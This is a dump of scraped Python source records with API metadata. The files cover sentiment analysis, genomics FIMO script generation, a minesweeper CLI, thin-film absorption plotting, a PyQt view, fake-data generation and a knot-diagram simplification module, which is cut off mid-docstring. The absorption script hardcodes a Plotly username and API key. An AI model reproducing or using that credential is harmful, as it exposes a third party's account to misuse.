"dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 12, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 12, "usage_type": "name"}, {"api_name": "mmlspark.lightgbm.LightGBMClassifier", "line_number": 19, "usage_type": "call"}, {"api_name": "src.utils.predager_config.predager_config.exp", "line_number": 29, "usage_type": "attribute"}, {"api_name": "src.utils.predager_config.predager_config", "line_number": 29, "usage_type": "name"}, {"api_name": "src.parser.csv_parser.load_as_df", "line_number": 30, "usage_type": "call"}, {"api_name": "src.schema.twitter_schema.twitter_schema", "line_number": 30, "usage_type": "argument"}, {"api_name": "src.preprocess.preprocessor.shape_df", "line_number": 31, "usage_type": "call"}, {"api_name": "src.utils.predager_config.predager_config.exp", "line_number": 36, "usage_type": "attribute"}, {"api_name": "src.utils.predager_config.predager_config", "line_number": 36, "usage_type": "name"}, {"api_name": "src.featurizer.word2vec_featurizer.Word2VecFeaturizer", "line_number": 37, "usage_type": "call"}, {"api_name": "pyspark.ml.evaluation.MulticlassClassificationEvaluator", "line_number": 59, "usage_type": "call"}, {"api_name": "pyspark.ml.evaluation.MulticlassClassificationEvaluator", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "434978939", "text": "import 
nltk\r\nnltk.download('vader_lexicon')\r\nfrom nltk.sentiment import SentimentIntensityAnalyzer\r\nwith open(\"input.txt\", \"r\") as input:\r\n input = input.readlines()\r\n\r\nformat1_input = []\r\nfor element in input:\r\n format1_input.append(element.strip())\r\n\r\nformat2_input = ' '.join(format1_input)\r\nformat3_input = format2_input.replace('\"', '')\r\nformat4_input = format3_input.replace(\"`\", \"\")\r\nformat5_input = format4_input.replace(\"'\", \"\")\r\nformat6_input = format5_input.replace(\".\", \"\")\r\nformat7_input = format6_input.replace(\"!\", \"\")\r\nformat8_input = format7_input.replace(\"?\", \"\")\r\nsia = SentimentIntensityAnalyzer()\r\nprint(sia.polarity_scores(format8_input))\r\n", "sub_path": "Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 668, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "nltk.download", "line_number": 2, "usage_type": "call"}, {"api_name": "nltk.sentiment.SentimentIntensityAnalyzer", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "48021895", "text": "import sys\nimport argparse\nfrom deeplearning.sequenceOperations import makeSequenceInputArraysFromDifferentialPeaks\n\ndef parseArgument():\n\t# Parse the input\n\tparser = argparse.ArgumentParser(description=\"Create a script to run FIMO on a list of pos. and neg. sets from DESeq2 results\")\n\tparser.add_argument(\"--DESeq2FileNameListFileName\", required=True, help=\"Name of file with list of DESeq2 output files\")\n\tparser.add_argument(\"--genomeFileName\", required=False, \\\n\t\tdefault=\"/mnt/data/annotations/by_organism/mouse/mm10/GRCm38.p4.genome.fa\", \\\n\t\thelp=\"File with genome sequence\")\n\tparser.add_argument(\"--backgroundFileName\", required=False, \\\n\t\tdefault=\"/srv/scratch/imk1/TFBindingPredictionProject/MouseMutantData/indivRep_allPeaks-pr1.IDR0.05.mergedPeaks.meanSummits.txt\", \\\n\t\thelp=\"File with the peaks or peak summits that went into DESeq2\")\n\tparser.add_argument(\"--sequenceLength\", type=int, required=False, default=1000, help=\"Number of bases in each sequence\")\n\tparser.add_argument(\"--chroms\", required=False,\\\n default=[\"chr1\", \"chr10\", \"chr11\", \"chr12\", \"chr13\", \"chr14\", \"chr15\", \"chr16\", \"chr17\", \"chr18\", \"chr19\", \"chr2\", \"chr3\", \\\n\t\t\t\t\"chr4\", \"chr5\", \"chr6\", \"chr7\", \"chr8\", \"chr9\", \"chrX\"], \\\n help=\"Name of chromosomes that will be used for FIMO\")\n\tparser.add_argument(\"--thresh\", type=float, required=False, default=0.001, help=\"Number of bases in each sequence\")\n\tparser.add_argument(\"--FIMOResultsDirNamePrefix\", required=False, \\\n\t\tdefault=\"/srv/scratch/imk1/TFBindingPredictionProject/MouseMutantData/FIMOResultsAll/indivRep_allPeaks-pr1.IDR0.05.ZF\", \\\n\t\thelp=\"Prefix of directory names where FIMO results will be recorded\") \n\tparser.add_argument(\"--FIMOPosDirNameSuffix\", required=False, default=\"vsWT.Pos\", \\\n\t\thelp=\"Suffix for directory with output from FIMO on the positive set\")\n\tparser.add_argument(\"--FIMONegDirNameSuffix\", required=False, default=\"vsWT.Neg\", \\\n help=\"Suffix for directory with output from FIMO on the negative set\")\n\tparser.add_argument(\"--FIMOBackgroundFileName\", required=False, \\\n\t\tdefault=\"/srv/scratch/imk1/TFBindingPredictionProject/MouseMutantData/150721_CTCF_motifs/background.1\",\n\t\thelp=\"Name of file with background for FIMO\")\n\tparser.add_argument(\"--FIMOPssmFileName\", required=False, 
\\\n\t\tdefault=\"/srv/scratch/imk1/TFBindingPredictionProject/MouseMutantData/150721_CTCF_motifs/PSPMList.txt\",\n\t\thelp=\"Name of file with PSSMs for FIMO\")\n\tparser.add_argument(\"--scriptFileName\", required=True, help=\"Name of file where the script will be written\")\n\toptions = parser.parse_args()\n\treturn options\n\t\ndef makeFIMODifferentialPeakScript(options):\n\t# Create a script to run FIMO on a list of pos. and neg. sets from DESeq2 results\n\tDESeq2FileNameListFile = open(options.DESeq2FileNameListFileName)\n\tscriptFile = open(options.scriptFileName, 'w+')\n\tindex = 0\n\tfor line in DESeq2FileNameListFile:\n\t\t# Iterate through the DESeq2 files and make 2 lines in the script for each, one for the pos. set and one for the neg. set\n\t\tindex = index + 1\n\t\t_, _, positiveFastaFileName, negativeFastaFileName, _, _ = makeSequenceInputArraysFromDifferentialPeaks(line.strip(), \\\n\t\t\toptions.genomeFileName, options.backgroundFileName, (1,4,options.sequenceLength), createOptimalBed=False, \\\n\t\t\tbackgroundSummitPresent=False, backgroundSummitOnly=True, createModelDir=False, chroms=options.chroms, \\\n\t\t\tbigWigFileNames=[], multiMode=False, streamData=False, dataFileName=\"\", RC=True, removeFastas=False, \\\n strictNegativeSet=False, fcCutoff=1, swapLabels=True, useDESeq2OutputFileNameForFastaFileName=True)\n\t\tFIMOPosDirName = options.FIMOResultsDirNamePrefix + str(index) + options.FIMOPosDirNameSuffix\n\t\tFIMONegDirName = options.FIMOResultsDirNamePrefix + str(index) + options.FIMONegDirNameSuffix\n\t\tscriptFile.write(\" \".join([\"fimo --thresh\", str(options.thresh), \"--max-stored-scores 1000000 --o\", FIMOPosDirName, \\\n\t\t\t\"--bgfile\", options.FIMOBackgroundFileName, options.FIMOPssmFileName, positiveFastaFileName]) + \"\\n\")\n\t\tscriptFile.write(\" \".join([\"fimo --thresh\", str(options.thresh), \"--max-stored-scores 1000000 --o\", FIMONegDirName, \\\n\t\t\t\"--bgfile\", options.FIMOBackgroundFileName, options.FIMOPssmFileName, negativeFastaFileName]) + \"\\n\")\n\tDESeq2FileNameListFile.close()\n\tscriptFile.close()\n\nif __name__ == \"__main__\":\n options = parseArgument()\n makeFIMODifferentialPeakScript(options)\n", "sub_path": "makeFIMODifferentialPeakScript.py", "file_name": "makeFIMODifferentialPeakScript.py", "file_ext": "py", "file_size_in_byte": 4409, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "deeplearning.sequenceOperations.makeSequenceInputArraysFromDifferentialPeaks", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "444473439", "text": "import re\nimport sys\n\nimport click\n\nfrom .core import Game, Grid\nfrom .utils import to_number\n\nEASY = 10\nNORMAL = 20\nHARD = 30\n\n\nclass CommandLine:\n def __init__(self, prompt='--> '):\n self.prompt = prompt\n\n def setup_game(self):\n print('Size of grid (in the form x) [7x10]')\n size = re.match(r'(\\d+)x(\\d+)', input(self.prompt) or '7x10')\n\n print('Difficulty of the game (easy, normal or hard) [normal]')\n difficulty = input(self.prompt) or 'normal'\n if difficulty == 'easy':\n bomb_percentage = EASY\n elif difficulty == 'hard':\n bomb_percentage = HARD\n else:\n bomb_percentage = NORMAL\n\n grid = Grid(int(size.group(1)), int(size.group(2)))\n self.game = Game(grid, bomb_percentage)\n self.game.init()\n\n @staticmethod\n def _process_input(move):\n raw_x = ''.join([char for char in move if char.isalpha()])\n 
raw_y = ''.join([char for char in move if char.isdigit()])\n if not raw_y:\n raise ValueError(\"A number is expected\")\n\n return to_number(raw_x), int(raw_y) - 1\n\n def print_help(self):\n help = (\"To select a cell, type the cell's position in the form 'a3' \"\n \"or '8h'.\\n\"\n \"To flag a cell, type 'flag ' or 'unflag' to \"\n \"unflag a cell.\\n\"\n \"To get the rules, type 'rules'.\\n\"\n \"Type quit (or exit) to quit the game.\\n\")\n print(help)\n\n def run(self):\n # TODO: clean up this mess\n print(self.game.grid, end='\\n\\n')\n print(\"What's your next move? (h for help)\")\n nb_cell_total = self.game.grid.nb_cols * self.game.grid.nb_rows\n\n while True:\n user_input = input(self.prompt)\n if user_input in ('h', 'help'):\n self.print_help()\n continue\n elif user_input in ('quit', 'exit'):\n sys.exit()\n else:\n try:\n x, y = self._process_input(user_input)\n cell = self.game.grid[x][y]\n except ValueError as e:\n print(e.args[0])\n continue\n\n if cell.is_bomb:\n for bomb in self.game.bombs:\n self.game.reveal(bomb)\n return False\n elif cell.value == 0:\n self.game.propagate(cell)\n\n self.game.reveal(self.game.grid[x][y])\n nb_revealed_cells = len(self.game.revealed_cells)\n if len(self.game.bombs) + nb_revealed_cells == nb_cell_total:\n for row in self.game.grid:\n for cell in row:\n cell.is_revealed = True\n if cell.is_bomb:\n cell.is_flagged = True\n\n return True\n\n print(self.game.grid, end='\\n\\n')\n print(\"What's your next move? (h for help)\")\n\n\n@click.command()\n@click.option('--graphic', '-g', is_flag=True,\n help='Run the game in terminal graphic mode')\ndef main(graphic):\n if graphic:\n print('Not implemented yet.')\n else:\n game = CommandLine()\n\n game.setup_game()\n has_win = game.run()\n print(game.game.grid, end='\\n\\n')\n if has_win:\n print('You won!')\n else:\n print('Meh, you could have done better...')\n\n return 0\n", "sub_path": "hersweeper/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 3496, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.match", "line_number": 20, "usage_type": "call"}, {"api_name": "core.Grid", "line_number": 31, "usage_type": "call"}, {"api_name": "core.Game", "line_number": 32, "usage_type": "call"}, {"api_name": "utils.to_number", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "click.command", "line_number": 96, "usage_type": "call"}, {"api_name": "click.option", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "26389480", "text": "from numpy import cos, inf, zeros, array, exp, conj, nan, isnan, pi, sin\n\nimport numpy as np\nimport pandas as pd\nimport time\n\nstart_time = time.time()\n\ncos_theta0 = 1\n# at first set theta1 to 0\ncos_theta1 = 1\n# when theta1 is 0, then so too is theta1\ncos_theta2 = 1\n# when theta1 is 0, then so too is theta2\nn_0 = 1\n# for air the refractive index is ~1\n\n# refractive index of Cu\nn_2 = 0.637\n\nprint(n_2)\n\n# we want n to vary between 0 and 3 with a step of 0.1\nsteps = int(3/0.1) + 1\nn = np.empty((steps))\nfiller = np.arange(0,3.1,0.1)\nindex_n = np.arange(n.size)\nnp.put(n,index_n,filler)\n\n# we want k to vary between 0 and 3 with a step of 0.1\nk = np.empty((steps))\nindex_k = np.arange(k.size)\nnp.put(k,index_k,filler)\n\nn = np.array(n)\nk = np.array(k).reshape((-1, 1))\nn_com = n + k.repeat(len(n), 1) * 1j\n\nprint ( \"time\", time.time() - start_time)\n\nr_01 = (cos_theta0 - 
n_com*cos_theta1)/(cos_theta0 + n_com*cos_theta1)\nt_01 = (2*cos_theta0)/(cos_theta0 + n_com*cos_theta1)\n\n# print(r_01)\n# print(t_01)\n\nr_12 = (n_com*cos_theta1 - n_2*cos_theta2)/(n_com*cos_theta1 + n_2*cos_theta2)\nt_12 = (2*n_com*cos_theta1)/(n_com*cos_theta1 + n_2*cos_theta2)\n\n# print(r_12)\n# print(t_12)\n\nl = [300, 500, 700, 900, 1100, 1300, 1500, 1700] # in units nm\nd = 200 # in units nm\n# phase thickness: one (n, k) matrix of beta values per wavelength\n# (the original outer loop over n_com recomputed the same list on every pass)\ntemp = []\nfor q in range(0, len(l)):\n beta = ((2*np.pi)/l[q])*n_com*d*cos_theta1\n temp.append(beta)\nbeta_mat = np.array(temp)\nz = 0 + 1j\n\n\nblock = np.exp(2*z*beta_mat)\n # double check whether this is e^+ or e^-\n\n# NumPy broadcasting evaluates every (n, k) pair at once, so no loops are needed\nr_film = (r_01 + (r_12*block))/(1 + r_01*r_12*block)\n\nprint ( \"time 2\", time.time() - start_time)\n# find r_film for all values of n contained in the array\n\nt_film = (t_01*t_12*block)/(1 + r_01*r_12*block)\n\n# find the absolute value of this and then square it\nABS_R = np.absolute(r_film)\n# print(ABS_R)\nR = np.power(ABS_R,2)\n# find the value of R which is equal to square of absolute value of r\n\nABS_T = np.absolute(t_film)\n# print(ABS_T)\nT = n_2*np.power(ABS_T,2)\n# find the value of T which is equal to square of absolute value of t\n\nA = 1 - T - R\n\nWeighted_Abs = [0.0280, 0.1950, 0.2026, 0.1674, 0.1343, 0.1099, 0.0918, 0.0711]\n\n# weighting with respect to the number of electrons in the solar spectrum for each\n# wavelength: a weighted average sum(w_i * A_i) / sum(w_i); the original per-term\n# expression (w_i * A_i) / w_i cancelled the weight and kept only the last wavelength\nA_final = sum(Weighted_Abs[i]*A[i] for i in range(len(l))) / sum(Weighted_Abs)\n\nprint ( \"time 3\", time.time() - start_time)\n\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport plotly\n# imports for Plotly\n\nplotly.tools.set_credentials_file(username='luka.j.v', api_key='K1pamGZFvMc64DABuoro')\n# username and api_key to host Plotly plots in my account\n\nprint ( \"time 4\", time.time() - start_time)\n\n# Contour plot of Absorption data for Copper\ncontour = [\n go.Contour(\n z=A_final,\n x=n,\n y=k,\n colorscale = [[0, 'rgb(255, 145, 97)'], [1, 'rgb(116, 11, 124)']],\n contours = dict(\n start = 0,\n end = 1,\n showlabels = True\n ),\n\n )\n]\n\ncontour_layout = go.Layout(\n title='Cu Absorption Contour Plot (Weighted over Solar Spectrum)',\n height = 800,\n width = 800,\n xaxis = dict(\n title = ' n values',\n titlefont =dict(\n size=24,\n )\n ),\n yaxis = dict(\n title = ' k values',\n titlefont =dict(\n size=24,\n )\n)\n)\nfig = go.Figure(data = contour, layout = contour_layout)\n\npy.iplot(fig, filename='Cu Absorption Contour (Weighted)')\n", "sub_path": "Abs_Cu_Wieghted.py", "file_name": "Abs_Cu_Wieghted.py", "file_ext": "py", "file_size_in_byte": 3843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "time.time", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.put", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 32,
"usage_type": "call"}, {"api_name": "numpy.put", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 104, "usage_type": "call"}, {"api_name": "plotly.tools.set_credentials_file", "line_number": 111, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 111, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 114, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Contour", "line_number": 118, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 118, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 132, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 132, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 149, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 149, "usage_type": "name"}, {"api_name": "plotly.plotly.iplot", "line_number": 151, "usage_type": "call"}, {"api_name": "plotly.plotly", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "5704487", "text": "import sys\nimport os\nimport yaml\nimport asyncio\nimport settings\nfrom apps.consts.const import undefined\nfrom apps.System.utils.Organization import Organization\nfrom apps.System.utils.User import User\n\n\nasync def init_system():\n with open(settings.INIT_SETTINGS_FILE, \"rb\") as file:\n organization_list = yaml.load(file).get(\"organization\")\n user_list = yaml.load(file).get(\"user\")\n\n org_dict = {}\n for organization in organization_list:\n org = await Organization.create(\n code=organization.get(\"code\", undefined),\n name=organization.get(\"name\", undefined),\n phone=organization.get(\"phone\", undefined),\n )\n org_dict[organization.get(\"code\", undefined)] = org.oid\n\n for user in user_list:\n User.create(\n org_id=org_dict.get(user.get('org_id').get('value', undefined), undefined),\n username=user.get('username', undefined),\n nickname=user.get('nickname', undefined),\n password=user.get('password', undefined),\n key=user.get('key', undefined),\n )\n\n\nasync def main():\n await init_system()\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n", "sub_path": "init/init_system.py", "file_name": "init_system.py", "file_ext": "py", "file_size_in_byte": 1236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "settings.INIT_SETTINGS_FILE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 13, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 14, "usage_type": "call"}, {"api_name": "apps.System.utils.Organization.Organization.create", "line_number": 18, "usage_type": "call"}, {"api_name": 
"apps.System.utils.Organization.Organization", "line_number": 18, "usage_type": "name"}, {"api_name": "apps.consts.const.undefined", "line_number": 19, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 20, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 21, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 23, "usage_type": "argument"}, {"api_name": "apps.System.utils.User.User.create", "line_number": 26, "usage_type": "call"}, {"api_name": "apps.System.utils.User.User", "line_number": 26, "usage_type": "name"}, {"api_name": "apps.consts.const.undefined", "line_number": 27, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 28, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 29, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 30, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 31, "usage_type": "argument"}, {"api_name": "asyncio.get_event_loop", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "544103066", "text": "from PyQt5.QtCore import QRectF, pyqtSignal, QRect\nfrom PyQt5.QtGui import QWheelEvent, QMouseEvent\nfrom PyQt5.QtWidgets import QGraphicsView, QToolTip\n\nfrom urh.ui.GridScene import GridScene\nfrom urh.util.Formatter import Formatter\n\n\nclass LiveGraphicView(QGraphicsView):\n zoomed = pyqtSignal(float)\n freq_clicked = pyqtSignal(float)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.min_width = 100\n self.max_width = \"auto\"\n self.capturing_data = True\n\n def wheelEvent(self, event: QWheelEvent):\n if self.capturing_data:\n return\n\n delta = event.angleDelta().y()\n zoom_factor = 1.001 ** delta\n p0scene = self.mapToScene(event.pos())\n w = self.view_rect().width()\n zooming_in = zoom_factor > 1\n if zooming_in and w / zoom_factor < self.min_width:\n return\n\n max_width = self.max_width\n if self.max_width == \"auto\":\n max_width = self.sceneRect().width()\n if not zooming_in and w / zoom_factor > max_width:\n self.update()\n return\n\n self.scale(zoom_factor, 1)\n p1mouse = self.mapFromScene(p0scene)\n move = p1mouse - event.pos()\n self.horizontalScrollBar().setValue(move.x() + self.horizontalScrollBar().value())\n self.zoomed.emit(zoom_factor)\n\n def mouseMoveEvent(self, event: QMouseEvent):\n if isinstance(self.scene(), GridScene):\n freq = self.scene().get_freq_for_pos(int(self.mapToScene(event.pos()).x()))\n if freq is not None:\n QToolTip.showText(self.mapToGlobal(event.pos()), \"Tune to:\"+Formatter.big_value_with_suffix(freq), None, QRect(), 10000)\n\n def mousePressEvent(self, event: QMouseEvent):\n if isinstance(self.scene(), GridScene):\n freq = self.scene().get_freq_for_pos(int(self.mapToScene(event.pos()).x()))\n if freq is not None:\n self.freq_clicked.emit(freq)\n\n def update(self, *__args):\n super().update(*__args)\n\n yscale = self.transform().m22()\n self.resetTransform()\n self.fitInView(self.sceneRect())\n if yscale != 1.0:\n self.scale(1, yscale / self.transform().m22()) # Restore YScale\n\n self.horizontalScrollBar().blockSignals(False)\n\n def view_rect(self) -> QRectF:\n return self.mapToScene(self.rect()).boundingRect()\n", "sub_path": "src/urh/ui/views/LiveGraphicView.py", "file_name": "LiveGraphicView.py", "file_ext": "py", "file_size_in_byte": 2409, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", 
"api": [{"api_name": "PyQt5.QtWidgets.QGraphicsView", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 11, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QWheelEvent", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QMouseEvent", "line_number": 44, "usage_type": "name"}, {"api_name": "urh.ui.GridScene.GridScene", "line_number": 45, "usage_type": "argument"}, {"api_name": "PyQt5.QtWidgets.QToolTip.showText", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QToolTip", "line_number": 48, "usage_type": "name"}, {"api_name": "urh.util.Formatter.Formatter.big_value_with_suffix", "line_number": 48, "usage_type": "call"}, {"api_name": "urh.util.Formatter.Formatter", "line_number": 48, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QMouseEvent", "line_number": 50, "usage_type": "name"}, {"api_name": "urh.ui.GridScene.GridScene", "line_number": 51, "usage_type": "argument"}, {"api_name": "PyQt5.QtCore.QRectF", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "409531814", "text": "# coding=utf-8\nfrom faker import Faker\nimport json\n\nfk = Faker()\n\n\ndef user():\n return {\n 'name': fk.name(),\n 'address': fk.address(),\n 'description': fk.text()\n }\n\n\nprint(json.dumps([user() for x in range(100)]))\n", "sub_path": "test_/fake_date.py", "file_name": "fake_date.py", "file_ext": "py", "file_size_in_byte": 241, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "faker.Faker", "line_number": 5, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "7194971", "text": "\"\"\"\nSimplifying link diagrams.\n\nImportant notes:\n\n* The link diagram is modified in place. All the relavent parts of the\ndata structure are updated at each step. \n\n* Unknot components which are also unlinked may be silently discarded.\n\"\"\"\n\nfrom .links import Link, Strand, Crossing\nfrom .. import graphs\nimport random\nimport networkx as nx\n\ndef remove_crossings(link, eliminate):\n \"\"\"\n Deletes the given crossings. 
Assumes that they have already been\n disconnected from the rest of the link, so this just updates\n link.crossings and link.link_components.\n \"\"\"\n if len(eliminate):\n for C in eliminate:\n link.crossings.remove(C)\n new_components = []\n for component in link.link_components:\n for C in eliminate:\n for cep in C.entry_points():\n try:\n component.remove(cep)\n except ValueError:\n pass\n if len(component):\n new_components.append(component)\n link.link_components = new_components\n \ndef reidemeister_I(link, C):\n \"\"\"\n Does a type-1 simplification on the given crossing C if possible.\n\n Returns the pair: {crossings eliminated}, {crossings changed}\n \"\"\"\n elim, changed = set(), set()\n for i in range(4):\n if C.adjacent[i] == (C, (i+1)%4):\n (A, a), (B, b) = C.adjacent[i+2], C.adjacent[i+3]\n elim = set([C])\n if C != A:\n A[a] = B[b]\n changed = set([A, B])\n\n remove_crossings(link, elim)\n return elim, changed\n \n\ndef reidemeister_I_and_II(link, A):\n \"\"\"\n Does a type-1 or type-2 simplification at the given crossing A if\n possible.\n\n Returns the pair: {crossings eliminated}, {crossings changed}\n \"\"\"\n eliminated, changed = reidemeister_I(link, A)\n if not eliminated:\n for a in range(4):\n (B, b), (C, c) = A.adjacent[a], A.adjacent[a+1]\n if B == C and (b-1) % 4 == c and (a+b) % 2 == 0:\n eliminated, changed = reidemeister_I(link, B)\n if eliminated:\n break\n else:\n W, w = A.adjacent[a+2]\n X, x = A.adjacent[a+3]\n Y, y = B.adjacent[b+1]\n Z, z = B.adjacent[b+2]\n eliminated = set([A, B])\n if W != B:\n W[w] = Z[z]\n changed.update(set([W, Z]))\n if X != B:\n X[x] = Y[y]\n changed.update(set([X, Y]))\n remove_crossings(link, eliminated)\n break\n\n return eliminated, changed\n\ndef basic_simplify(link):\n \"\"\"\n Do Reidemeister I and II moves until none are possible.\n \"\"\"\n to_visit, eliminated = set(link.crossings), set()\n while to_visit:\n crossing = to_visit.pop()\n elim, changed = reidemeister_I_and_II(link, crossing)\n assert not elim.intersection(changed)\n eliminated.update(elim)\n to_visit.difference_update(elim)\n to_visit.update(changed)\n\n success = len(eliminated) > 0\n\n # Redo the strand labels (used for DT codes)\n if success:\n component_starts = []\n for component in link.link_components:\n a, b = component[:2]\n if a.strand_label() % 2 == 0:\n component_starts.append(a)\n else:\n component_starts.append(b)\n link._build_components(component_starts)\n return success\n\ndef possible_type_III_moves(link):\n \"\"\"\n Returns all triples of crossings where a type III move is possible.\n\n In this example, one type III move is forbidden since a crossing\n repeats twice.\n \n >>> L = Link([(2,1,3,2),(3,8,4,1),(4,6,5,5),(6,8,7,7)])\n >>> len(possible_type_III_moves(L))\n 1\n \"\"\"\n ans = []\n for face in link.faces():\n if len(face) == 3:\n if sum(ce.entry_point % 2 for ce in face) in [1, 2]:\n while(face[1][1]% 2 != 0 or face[2][1]% 2 != 1): # renumber face_list\n face = [face[1], face[2], face[0]]\n if len(set([e.crossing for e in face])) == 3: # No repeated crossings\n ans.append(face)\n return ans\n\ndef insert_strand(X, x):\n Y, y = X.adjacent[x]\n S = Strand()\n S[0], S[1] = X[x], Y[y]\n return S\n\ndef reidemeister_III(link, triple):\n \"\"\"\n Performs the given type III move. 
Modifies the given link but doesn't\n update its lists of link components.\n \"\"\"\n A, B, C = [t.crossing for t in triple]\n a, b, c = [t.entry_point for t in triple]\n # We insert Strands around the border of the triple to make the code more\n # transparent and eliminate some special cases.\n old_border = [(C, c-1), (C, c-2), (A, a-1), (A, a-2), (B, b-1), (B, b-2)]\n border_strands = [insert_strand(*P) for P in old_border]\n new_boarder = [(A,a), (B, b+1), (B, b), (C, c+1), (C, c), (A, a+1)]\n for i, (X,x) in enumerate(new_boarder):\n X[x] = border_strands[i][0]\n A[a-1], B[b-1], C[c-1] = B[b+2], C[c+2], A[a+2]\n [S.fuse() for S in border_strands]\n\ndef simplify_via_level_type_III(link, max_consecutive_failures=100):\n \"\"\"\n Applies a series of type III moves to the link, simplifying it via type\n I and II moves whenever possible.\n \"\"\"\n failures, success = 0, False\n if basic_simplify(link):\n success = True\n while failures < max_consecutive_failures:\n poss_moves = possible_type_III_moves(link)\n if len(poss_moves) == 0:\n break\n reidemeister_III(link, random.choice(poss_moves))\n if basic_simplify(link):\n failures = 0\n success = True\n else:\n failures += 1\n\n link._build_components()\n return success\n\ndef common_element(X, Y):\n return list(set(X) & set(Y))[0]\n\nclass Face(tuple):\n \"\"\"\n A complementary region of the link diagram.\n \"\"\"\n def __new__(cls, edges, label=None):\n ans = tuple.__new__(cls, edges)\n ans.label = label\n return ans\n\n def __repr__(self):\n return \"\" % self.label\n\nclass DualGraphOfFaces(graphs.Graph):\n \"\"\"\n The dual graph to a link diagram D, whose vertices correspond to\n complementary regions (faces) of D and whose edges are dual to the\n edges of D.\n \"\"\"\n def __init__(self, link):\n graphs.Graph.__init__(self)\n faces = [Face(face, i) for i, face in enumerate(link.faces())]\n self.edge_to_face = to_face = {}\n for face in faces:\n for edge in face:\n to_face[edge] = face\n\n for edge, face in to_face.iteritems():\n neighbor = to_face[edge.opposite()]\n if face.label < neighbor.label:\n dual_edge = self.add_edge(face, neighbor)\n dual_edge.interface = (edge, edge.opposite())\n dual_edge.label= len(self.edges) - 1\n\n #assert self.is_planar()\n\n def two_cycles(self):\n \"\"\"\n Finds all two cycles and returns them as a pair of CrossingStrands which\n are dual to the edges in the cycle. 
